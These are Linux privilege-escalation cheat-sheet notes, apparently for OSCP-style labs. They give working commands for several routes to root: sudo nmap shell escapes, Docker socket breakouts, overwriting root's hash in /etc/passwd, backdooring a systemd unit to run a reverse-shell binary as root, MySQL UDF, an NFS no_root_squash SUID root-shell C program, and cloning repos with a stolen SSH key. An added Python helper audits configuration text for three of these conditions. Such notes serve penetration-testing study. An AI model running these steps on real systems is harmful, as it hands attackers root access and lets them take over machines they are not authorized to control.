Linux Privilege Escalation

Commands

sudo -u scriptmanager bash

Tips:

  • Privilege escalation (PE) may rely on the same vulnerability that gave the initial foothold.

Scripts

SUDO Misconfigurations

NOPASSWD - run Sudo without a password

$ sudo -l                 # confirm misconfiguration
$ sudo nmap --interactive # start interactive nmap
nmap> !sh                 # pop root shell

LD_PRELOAD

SUID / SGID

suid3num.py

  • Finds SUID binaries and cross-matches them against the GTFOBins list.
  • Do not use the -e flag (auto-exploitation); it is banned on the OSCP exam.

$ python suid3num.py

Running services

Tips:

  • Check firewall rules.
  • Check for anti-virus software and see whether it needs to be disabled.

Method 1:

  • Check whether the binary, script or argument file used by a service running as root is writable by your user.
  • Overwrite that binary or referenced file/argument with your own payload for privesc.

Method 2:

  • Check the version of each service running as root.
  • See whether that version has a known local privilege escalation vulnerability.

Binary service versions

GTFOBins

  • GTFOBins is a curated list of Unix binaries that can be abused for privesc on misconfigured systems.
  • Check the binaries you find against the GTFOBins list.

Vulnerable binary versions

  1. Look for binaries, especially non-standard ones.
  2. Run $ searchsploit [binary_name] [version] and exploit.

Docker privesc

Basic privesc example: https://flast101.github.io/docker-privesc/
More on Docker breakout & privesc: https://book.hacktricks.xyz/linux-unix/privilege-escalation/docker-breakout

Writable Docker socket /var/run/docker.sock

  • Detected by linpeas.sh or manually.
  • Requires a local image; if none is present, run docker pull to download one to the machine.

# CHECK IF WRITABLE
$ ls -la /var/run/docker.sock

# OPTION 1
$ docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash

# OPTION 2
$ docker -H unix:///var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh

Writable /etc/passwd

Replace root password hash

  1. Kali: generate a password hash with openssl passwd hacker123.
  2. Target: replace root's password placeholder x in /etc/passwd with that hash, e.g. root:<hash>:0:0:----

Writable .service Files

Check whether you can write to any .service file. If you can, you can modify it so that it executes your backdoor when the service is started, restarted or stopped.

# check contents of .service file
$ cat /etc/systemd/system/app.service
[Unit]
Description=Python App
After=network-online.target
[Service]
Type=simple
WorkingDirectory=/home/john/app
ExecStart=flask run -h 0.0.0.0 -p 50000
TimeoutSec=30
RestartSec=15s
User=john
ExecReload=/bin/kill -USR1 $MAINPID
Restart=on-failure
 
[Install]
WantedBy=multi-user.target
 
# change configuration on the target (XXX = working directory of your choice)
WorkingDirectory=XXX
ExecStart=/home/john/rshell
User=root
 
# restart host or service
$ sudo reboot
$ service xxx restart

MySQL User-Defined-Functions (UDF)

MySQL UDF privilege escalation.

If you get the below error, simply replace /usr/lib/mysql/plugin/raptor_udf2.so with the raptor_udf2.so file you created originally.

mysql> create function do_system returns integer soname 'raptor_udf2.so';
ERROR 1126 (HY000): Can't open shared library 'raptor_udf2.so' (errno: 0 /usr/lib/mysql/plugin/raptor_udf2.so: file too short)

If you cannot use the MySQL client interactively, execute commands non-interactively with:

  • mysql -u root -p[password] mysql -e "[mysql_command]"

NFS no_root_squash Misconfiguration

Exploit NFS shares for privesc.

Discover the vulnerability with cat /etc/exports (on the NFS server) and check whether a directory is exported with no_root_squash; from a client, showmount -e lists the exports.

Mount misconfigured directory

$ showmount -e 192.168.xx.53
Export list for 192.168.xx.53:
/shared 192.168.xx.0/255.255.255.0
$ mkdir /tmp/mymount
/bin/mkdir: created directory '/tmp/mymount'
$ mount -t nfs 192.168.xx.53:/shared /tmp/mymount -o nolock

Create payload

# generic C exploit (exploit.c)
#include <stdio.h>
#include <stdlib.h>   /* system() */
#include <unistd.h>   /* setuid(), setgid() */
int main(void)
{
    setuid(0);            /* keep the uid 0 granted by the SUID bit */
    setgid(0);
    system("/bin/bash");  /* spawn a root shell */
    return 0;
}
$ gcc exploit.c -m32 -o exploit   # -m32 only if the target is 32-bit

Copy the payload and set the SUID bit (as root on the client; no_root_squash keeps the file root-owned)

$ cp /root/Desktop/exploit /tmp/mymount/
$ chmod u+s /tmp/mymount/exploit
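An added defender-side audit helper (not part of the original notes) that parses captured copies of /etc/exports, /etc/passwd and a systemd unit file and reports the no_root_squash export, inline root hash and root-run-from-user-path conditions described in the NFS, writable /etc/passwd and writable .service sections above; all sample inputs are constructed.

```python
"""Added audit helpers: parse captured config text and return findings; no live-host access."""
USER_WRITABLE = ("/home/", "/tmp/", "/var/tmp/", "/dev/shm/")

def nfs_no_root_squash(exports_text):
    """(export_path, client) pairs exported with no_root_squash, i.e. a remote
    root user keeps uid 0 on the share and can plant a root-owned SUID file."""
    findings = []
    for line in exports_text.splitlines():
        fields = line.split("#", 1)[0].split()         # drop comments, split on whitespace
        if not fields:
            continue
        path, clients = fields[0], fields[1:]
        for spec in clients:                            # each looks like client(opt,opt)
            client, _, opts = spec.partition("(")
            if "no_root_squash" in opts.rstrip(")").split(","):
                findings.append((path, client))
    return findings

def passwd_root_inline_hash(passwd_text):
    """True when root's password field holds a hash instead of the 'x'
    placeholder: the trace left by the /etc/passwd overwrite above."""
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 7 and f[0] == "root":
            return not (f[1] in ("x", "") or f[1].startswith(("!", "*")))
    return False

def unit_root_from_user_path(unit_text):
    """Paths in [Service] that a root-run unit executes or enters from a
    user-writable area (or resolves via PATH); [] if the unit is not root."""
    section, user, paths = None, "root", []          # no User= means root
    for line in unit_text.splitlines():
        line = line.strip()
        if line.startswith("["):
            section = line
        elif section == "[Service]" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip() == "User":
                user = value.strip()
            elif key.strip() in ("ExecStart", "WorkingDirectory"):
                paths += value.strip().lstrip("-@!+:").split()[:1]   # strip systemd prefixes
    if user != "root":
        return []
    return [p for p in paths if not p.startswith("/") or p.startswith(USER_WRITABLE)]

# Constructed samples (not captured from any real host)
EXPORTS = "/shared 192.168.56.0/255.255.255.0(rw,sync,no_root_squash)\n/data *(ro)\n"
PASSWD = "root:$6$constructedsalt$constructedhash:0:0:root:/root:/bin/bash\n"
UNIT = "[Service]\nWorkingDirectory=/home/john/app\nExecStart=/home/john/app/run.sh\nUser=root\n"
```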

Git

Found references to git / a git repo plus a private SSH key?

# extract remote repository
$ cp /home/[user]/.ssh/id_rsa ~/.ssh/                # copy key to your .ssh dir
$ git clone file:///[repo_name]                      # git clone OPTION 1
$ git clone ssh://[user]@[target]:[port]/[repo_name] # git clone OPTION 2